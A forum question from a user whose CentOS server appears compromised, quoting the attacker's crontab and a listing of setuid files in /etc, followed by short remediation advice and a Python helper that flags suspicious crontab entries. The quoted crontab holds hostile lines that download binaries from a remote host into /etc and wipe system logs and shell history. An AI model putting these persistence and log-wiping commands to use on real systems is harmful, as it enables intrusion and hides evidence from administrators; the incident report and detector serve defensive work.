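CentOS hacked, crontab has been modified
I believe someone or a virus has broken into my CentOS box. I recently opened SSH for one day. The box is on a LAN. I only needed to use it for a while when I was out.
That evening, accessing the Linux box over SSH on the LAN became slow, and opening any local web page was slow. It was behaving strangely. I checked and the CPU was sometimes very high. So I checked the crontab. It had been changed.
There is a bunch of stuff like this: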
20 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
I can see that my /etc/ folder now contains this:
srwsrwt 1 root root 1524643 Jan 31 21:06 atdd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 atddd
srwsrwt 1 root root 1258750 Nov 24 14:22 cupsdd
-rwsrwsrwt 1 root root 1258750 Nov 24 14:22 cupsddd
srwsrwt 1 root root 1524643 Jan 31 21:06 ksapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 ksapdd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 kysapdd
srwsrwt 1 root root 1524643 Jan 10 20:06 sksapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:07 sksapdd
-rwsrwsrwt 1 root root 1524643 Oct 24 04:55 skysapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:07 skysapdd
srwsrwt 1 root root 1524643 Feb 5 17:26 xfsdx
-rwsrwsrwt 1 root root 1524643 Feb 5 17:26 xfsdxd
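What is going on with the multiple folders in red? What can I do?
Delete all of these lines from the crontab, check your logs (/var/log/messages, for example), and also use 'last' to see past connections. Just in case, change your root password. – fedorqui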
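As an added example (not part of the original question or comment), a small Python triage helper that flags crontab entries showing the traits visible in the listing above: remote downloads into system directories, redirects onto log or history file names, and minute steps above 59. The function names and patterns are assumptions chosen for illustration.

```python
import re

# Heuristics modelled on the entries shown in the question (illustrative names).
DOWNLOADER = re.compile(r"\b(wget|curl)\b")
SYSTEM_DIR = re.compile(r"\bcd\s+(/etc|/root|/var/log)\b")
REDIRECT = re.compile(r"(?<!>)>(?!>)\s*(\S+)")  # single '>' only, not '>>'
LOG_NAMES = re.compile(r"(log|history|^[bwu]tmp$|^secure$|^messages$|^cron$|^dmesg$)")
STEP = re.compile(r"^\*/(\d+)$")


def audit_line(line):
    """Return the list of reasons a crontab line looks suspicious."""
    fields = line.split(None, 5)
    if len(fields) < 6 or line.lstrip().startswith("#"):
        return []
    minute, command = fields[0], fields[5]
    reasons = []
    step = STEP.match(minute)
    if step and int(step.group(1)) > 59:
        reasons.append("minute step %s exceeds the 0-59 range" % step.group(1))
    if DOWNLOADER.search(command):
        reasons.append("fetches a remote file")
        if SYSTEM_DIR.search(command):
            reasons.append("writes the download into a system directory")
    target = REDIRECT.search(command)
    if target and LOG_NAMES.search(target.group(1)):
        reasons.append("redirect truncates a file named %s" % target.group(1))
    return reasons


def audit_crontab(text):
    """Map 1-based line numbers to reasons, for flagged lines only."""
    found = {n: audit_line(l) for n, l in enumerate(text.splitlines(), 1)}
    return {n: r for n, r in found.items() if r}


# Constructed sample: three entries copied from the question plus one benign job.
SAMPLE = """\
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /root > .bash_history
0 3 * * * /usr/bin/updatedb
"""

if __name__ == "__main__":
    for number, reasons in audit_crontab(SAMPLE).items():
        print(number, "; ".join(reasons))
```

Feed it the output of `crontab -l` for each account and review every flagged line by hand before deleting anything; the patterns are heuristics, so a legitimate job that overwrites its own log file will also be flagged.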